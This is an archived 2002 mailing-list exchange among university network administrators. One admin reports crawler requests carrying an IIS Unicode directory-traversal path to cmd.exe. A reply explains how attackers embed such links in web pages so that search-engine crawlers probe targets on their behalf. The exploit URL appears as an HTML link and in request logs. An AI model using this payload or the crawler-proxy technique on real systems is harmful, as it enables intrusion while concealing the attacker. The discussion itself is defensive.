[unisog] A new way to look for exploits

Patrick Aland paland at stetson.edu
Thu Mar 14 18:30:01 GMT 2002


There was an article in the last phrack about using search engines to
scan hosts.

For instance if I make a document that contains:


<a
href=http://yourdomain/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe>Link</a>

When a search comes along a indexes it ist will try to follow that link
and thus attempt to exploit your system. The phrack article took it a
bit farther by having it drop a payload, etc.

If you make a file containing a ton of link to seperate ip its will prbe
them for you.

You may want to check it out. I think ti was in Phrack 57 Rise of the
Roboits or something.


On Thu, Mar 14, 2002 at 10:30:08AM -0500, John E. Tysko wrote:
> 
>  Recently, I noticed several of our machines being scanned by
> alexa.com, presumably for the web archive services provided by
> archive.org. Several requests for interesting web pages came
> to my attention, and one of the latest from yesterday looked 
> like this; 2 connetions, the first, a polite:
> 
>    GET /robots.txt HTTP/1.0
>    Connection: close
>    Host: 132.235.16.144
>    User-Agent: ia_archiver
>    From: crawler at alexa.com
> 
> and the second, an interesting:
> 
>    GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.0
>    Connection: close
>    Host: 132.235.x.x
>    User-Agent: ia_archiver
>    From: crawler at alexa.com
> 
> 
> It would seems there is a new way to probe for security holes
> without giving away your ip.
> 
> Is this unique to our machines, or has anyone else seen this?
> 
> John
> 
>   John Tysko                                      
>   Systems Administrator                           
>   Electrical Engineering and Computer Science     
>   Ohio University, Athens Oh 45701                
> 

-- 
------------------------------------------------------------
 Patrick Aland                          paland at stetson.edu
 Network Administrator                  Voice: 386.822.7217
 Stetson University                     Fax: 386.822.7367
------------------------------------------------------------



More information about the unisog mailing list